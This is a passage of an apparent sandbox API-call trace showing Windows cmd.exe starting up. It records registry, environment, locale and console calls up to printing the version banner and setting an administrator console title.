0x7ff6de067ff0 [0135.805] _onexit (_Func=0x7ff6de068000) returned 0x7ff6de068000 [0135.805] _onexit (_Func=0x7ff6de068010) returned 0x7ff6de068010 [0135.806] _onexit (_Func=0x7ff6de068020) returned 0x7ff6de068020 [0135.806] GetCurrentThreadId () returned 0xf3c [0135.806] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf3c) returned 0x70 [0135.806] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffe6b4d0000 [0135.806] GetProcAddress (hModule=0x7ffe6b4d0000, lpProcName="SetThreadUILanguage") returned 0x7ffe6b4ea990 [0135.806] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.890] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.890] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x58b38ff758 | out: phkResult=0x58b38ff758*=0x0) returned 0x2 [0135.890] VirtualQuery (in: lpAddress=0x58b38ff744, lpBuffer=0x58b38ff6c0, dwLength=0x30 | out: lpBuffer=0x58b38ff6c0*(BaseAddress=0x58b38ff000, AllocationBase=0x58b3800000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.890] VirtualQuery (in: lpAddress=0x58b3800000, lpBuffer=0x58b38ff6c0, dwLength=0x30 | out: lpBuffer=0x58b38ff6c0*(BaseAddress=0x58b3800000, AllocationBase=0x58b3800000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.890] VirtualQuery (in: lpAddress=0x58b3801000, lpBuffer=0x58b38ff6c0, dwLength=0x30 | out: lpBuffer=0x58b38ff6c0*(BaseAddress=0x58b3801000, AllocationBase=0x58b3800000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.890] VirtualQuery (in: lpAddress=0x58b3804000, lpBuffer=0x58b38ff6c0, dwLength=0x30 | out: lpBuffer=0x58b38ff6c0*(BaseAddress=0x58b3804000, AllocationBase=0x58b3800000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.891] VirtualQuery (in: lpAddress=0x58b3900000, lpBuffer=0x58b38ff6c0, dwLength=0x30 | out: lpBuffer=0x58b38ff6c0*(BaseAddress=0x58b3900000, AllocationBase=0x58b3900000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.891] GetConsoleOutputCP () returned 0x1b5 [0135.905] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0135.905] SetConsoleCtrlHandler (HandlerRoutine=0x7ff6de078150, Add=1) returned 1 [0135.905] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.905] GetConsoleMode (in: hConsoleHandle=0x274, lpMode=0x7ff6de08fc04 | out: lpMode=0x7ff6de08fc04) returned 0 [0135.905] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.905] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x7ff6de08fc00 | out: lpMode=0x7ff6de08fc00) returned 0 [0135.905] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.905] SetConsoleMode (hConsoleHandle=0x274, dwMode=0x0) returned 0 [0135.905] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.905] GetConsoleMode (in: hConsoleHandle=0x274, lpMode=0x7ff6de08fc08 | out: lpMode=0x7ff6de08fc08) returned 0 [0135.905] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.905] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x7ff6de08fc0c | out: lpMode=0x7ff6de08fc0c) returned 0 [0135.905] GetEnvironmentStringsW () returned 0x1eeca2b5a10* [0135.906] GetProcessHeap () returned 0x1eeca2b0000 [0135.906] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xa7c) returned 0x1eeca2b64a0 [0135.906] FreeEnvironmentStringsA (penv="A") returned 1 [0135.906] GetProcessHeap () returned 0x1eeca2b0000 [0135.906] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x8) returned 0x1eeca2b6f30 [0135.906] GetEnvironmentStringsW () returned 0x1eeca2b5a10* [0135.906] GetProcessHeap () returned 0x1eeca2b0000 [0135.906] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xa7c) returned 0x1eeca2b6f50 [0135.906] FreeEnvironmentStringsA (penv="A") returned 1 [0135.906] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x58b38fe608 | out: phkResult=0x58b38fe608*=0x7c) returned 0x0 [0135.906] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x0, lpData=0x58b38fe620*=0x4, lpcbData=0x58b38fe604*=0x1000) returned 0x2 [0135.906] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x4, lpData=0x58b38fe620*=0x1, lpcbData=0x58b38fe604*=0x4) returned 0x0 [0135.906] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x0, lpData=0x58b38fe620*=0x1, lpcbData=0x58b38fe604*=0x1000) returned 0x2 [0135.906] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x4, lpData=0x58b38fe620*=0x0, lpcbData=0x58b38fe604*=0x4) returned 0x0 [0135.906] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x4, lpData=0x58b38fe620*=0x40, lpcbData=0x58b38fe604*=0x4) returned 0x0 [0135.906] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x4, lpData=0x58b38fe620*=0x40, lpcbData=0x58b38fe604*=0x4) returned 0x0 [0135.906] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x0, lpData=0x58b38fe620*=0x40, lpcbData=0x58b38fe604*=0x1000) returned 0x2 [0135.906] RegCloseKey (hKey=0x7c) returned 0x0 [0135.906] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x58b38fe608 | out: phkResult=0x58b38fe608*=0x7c) returned 0x0 [0135.907] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x0, lpData=0x58b38fe620*=0x40, lpcbData=0x58b38fe604*=0x1000) returned 0x2 [0135.907] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x4, lpData=0x58b38fe620*=0x1, lpcbData=0x58b38fe604*=0x4) returned 0x0 [0135.907] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x0, lpData=0x58b38fe620*=0x1, lpcbData=0x58b38fe604*=0x1000) returned 0x2 [0135.907] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x4, lpData=0x58b38fe620*=0x0, lpcbData=0x58b38fe604*=0x4) returned 0x0 [0135.907] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x4, lpData=0x58b38fe620*=0x9, lpcbData=0x58b38fe604*=0x4) returned 0x0 [0135.907] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x4, lpData=0x58b38fe620*=0x9, lpcbData=0x58b38fe604*=0x4) returned 0x0 [0135.907] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x58b38fe600, lpData=0x58b38fe620, lpcbData=0x58b38fe604*=0x1000 | out: lpType=0x58b38fe600*=0x0, lpData=0x58b38fe620*=0x9, lpcbData=0x58b38fe604*=0x1000) returned 0x2 [0135.907] RegCloseKey (hKey=0x7c) returned 0x0 [0135.907] time (in: timer=0x0 | out: timer=0x0) returned 0x5d1e4852 [0135.907] srand (_Seed=0x5d1e4852) [0135.907] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0135.907] malloc (_Size=0x4000) returned 0x1eeca5154f0 [0135.907] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0135.907] malloc (_Size=0xffce) returned 0x1eeca3b0080 [0135.908] ??_V@YAXPEAX@Z () returned 0x1eeca3b0080 [0135.908] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1eeca3b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.908] malloc (_Size=0xffce) returned 0x1eeca3c0060 [0135.909] ??_V@YAXPEAX@Z () returned 0x1eeca3c0060 [0135.909] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1eeca3c0060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0135.909] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0135.909] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.909] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.909] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.909] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.910] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.910] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.910] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.910] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.910] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.910] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.910] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.910] GetProcessHeap () returned 0x1eeca2b0000 [0135.910] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b64a0) returned 1 [0135.910] GetEnvironmentStringsW () returned 0x1eeca2b5a10* [0135.910] GetProcessHeap () returned 0x1eeca2b0000 [0135.910] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xa94) returned 0x1eeca2b7a10 [0135.910] FreeEnvironmentStringsA (penv="A") returned 1 [0135.910] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0135.910] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.910] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.910] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.910] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.910] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.910] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.910] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.910] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.910] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.910] malloc (_Size=0xffce) returned 0x1eeca3d0040 [0135.911] ??_V@YAXPEAX@Z () returned 0x1eeca3d0040 [0135.911] GetProcessHeap () returned 0x1eeca2b0000 [0135.911] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x38) returned 0x1eeca2b84b0 [0135.911] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1eeca3d0040 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.911] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x7fe7, lpBuffer=0x1eeca3d0040, lpFilePart=0x58b38ff180 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x58b38ff180*="system32") returned 0x13 [0135.912] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0135.912] FindFirstFileW (in: lpFileName="C:\\WINDOWS", lpFindFileData=0x58b38feeb0 | out: lpFindFileData=0x58b38feeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x1eeca2b84f0 [0135.912] FindClose (in: hFindFile=0x1eeca2b84f0 | out: hFindFile=0x1eeca2b84f0) returned 1 [0135.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x58b38feeb0 | out: lpFindFileData=0x58b38feeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x8187ef5e, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0x8187ef5e, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x1eeca2b84f0 [0135.912] FindClose (in: hFindFile=0x1eeca2b84f0 | out: hFindFile=0x1eeca2b84f0) returned 1 [0135.912] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0135.912] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0135.912] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0135.913] GetProcessHeap () returned 0x1eeca2b0000 [0135.913] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b7a10) returned 1 [0135.913] GetEnvironmentStringsW () returned 0x1eeca2b84f0* [0135.913] GetProcessHeap () returned 0x1eeca2b0000 [0135.913] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xac4) returned 0x1eeca2b5a10 [0135.913] FreeEnvironmentStringsA (penv="=") returned 1 [0135.913] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1eeca3b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.913] GetProcessHeap () returned 0x1eeca2b0000 [0135.913] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b84b0) returned 1 [0135.913] ??_V@YAXPEAX@Z () returned 0x1 [0135.913] ??_V@YAXPEAX@Z () returned 0x1 [0135.913] GetProcessHeap () returned 0x1eeca2b0000 [0135.913] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x4016) returned 0x1eeca2b7a10 [0135.913] GetProcessHeap () returned 0x1eeca2b0000 [0135.913] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b7a10) returned 1 [0135.913] GetConsoleOutputCP () returned 0x1b5 [0135.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0135.915] GetUserDefaultLCID () returned 0x409 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff6de08bb78, cchData=8 | out: lpLCData=":") returned 2 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x58b38ff540, cchData=128 | out: lpLCData="0") returned 2 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x58b38ff540, cchData=128 | out: lpLCData="0") returned 2 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x58b38ff540, cchData=128 | out: lpLCData="1") returned 2 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff6de08bb68, cchData=8 | out: lpLCData="/") returned 2 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff6de08bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff6de08bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff6de08ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff6de08ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff6de08ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff6de08b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff6de08b980, cchData=32 | out: lpLCData="Sun") returned 4 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff6de08bb58, cchData=8 | out: lpLCData=".") returned 2 [0135.916] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff6de08bb40, cchData=8 | out: lpLCData=",") returned 2 [0135.916] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.918] GetProcessHeap () returned 0x1eeca2b0000 [0135.918] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, Size=0x20c) returned 0x1eeca2b6550 [0135.918] GetConsoleTitleW (in: lpConsoleTitle=0x1eeca2b6550, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0135.918] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.918] GetFileType (hFile=0x274) returned 0x3 [0135.919] ApiSetQueryApiSetPresence () returned 0x0 [0135.919] ResolveDelayLoadedAPI () returned 0x7ffe62c3d990 [0135.929] BrandingFormatString () returned 0x1eeca2b6c20 [0135.939] GetVersion () returned 0x3ad7000a [0135.939] _vsnwprintf (in: _Buffer=0x58b38ff6a0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x58b38ff638 | out: _Buffer="10.0.15063") returned 10 [0135.939] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.939] GetFileType (hFile=0x274) returned 0x3 [0135.939] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6de097f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0135.939] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6de097f60, nSize=0x2000, Arguments=0x58b38ff640 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0135.940] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.940] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0135.940] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x58b38ff598, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff598*=0x26, lpOverlapped=0x0) returned 1 [0135.940] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58b38ff668 | out: _Buffer="\r\n") returned 2 [0135.940] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.940] GetFileType (hFile=0x274) returned 0x3 [0135.940] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.940] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0135.940] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x58b38ff638, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff638*=0x2, lpOverlapped=0x0) returned 1 [0135.940] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0x58b38ff668 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0135.940] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.940] GetFileType (hFile=0x274) returned 0x3 [0135.940] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.940] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0135.940] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x58b38ff638, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff638*=0x34, lpOverlapped=0x0) returned 1 [0135.940] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58b38ff668 | out: _Buffer="\r\n") returned 2 [0135.940] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.940] GetFileType (hFile=0x274) returned 0x3 [0135.940] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.940] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0135.940] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x58b38ff638, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff638*=0x2, lpOverlapped=0x0) returned 1 [0135.940] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffe6b4d0000 [0135.941] GetProcAddress (hModule=0x7ffe6b4d0000, lpProcName="CopyFileExW") returned 0x7ffe6b4ee830 [0135.941] GetProcAddress (hModule=0x7ffe6b4d0000, lpProcName="IsDebuggerPresent") returned 0x7ffe6b4ee300 [0135.941] GetProcAddress (hModule=0x7ffe6b4d0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffe67f50a40 [0135.941] ??_V@YAXPEAX@Z () returned 0x1 [0135.941] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.941] GetFileType (hFile=0x264) returned 0x3 [0135.941] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0135.941] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x58b38ff4a8 | out: TokenHandle=0x58b38ff4a8*=0x0) returned 0xc000007c [0135.941] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x58b38ff4a8 | out: TokenHandle=0x58b38ff4a8*=0x94) returned 0x0 [0135.941] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0x58b38ff458, TokenInformationLength=0x4, ReturnLength=0x58b38ff460 | out: TokenInformation=0x58b38ff458, ReturnLength=0x58b38ff460) returned 0x0 [0135.941] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0x58b38ff460, TokenInformationLength=0x4, ReturnLength=0x58b38ff458 | out: TokenInformation=0x58b38ff460, ReturnLength=0x58b38ff458) returned 0x0 [0135.941] NtClose (Handle=0x94) returned 0x0 [0135.941] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x58b38ff470, nSize=0x0, Arguments=0x58b38ff478 | out: lpBuffer="渰쨫Ǯ") returned 0xf [0135.941] GetProcessHeap () returned 0x1eeca2b0000 [0135.941] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x218) returned 0x1eeca2b8bb0 [0135.942] GetConsoleTitleW (in: lpConsoleTitle=0x58b38ff4c0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0135.951] wcsstr (_Str="C:\\WINDOWS\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0135.951] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0135.956] GetProcessHeap () returned 0x1eeca2b0000 [0135.956] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b8bb0) returned 1 [0135.956] LocalFree (hMem=0x1eeca2b6e30) returned 0x0 [0135.957] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58b38ff2e8 | out: _Buffer="\r\n") returned 2 [0135.957] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.957] GetFileType (hFile=0x274) returned 0x3 [0135.957] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.957] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 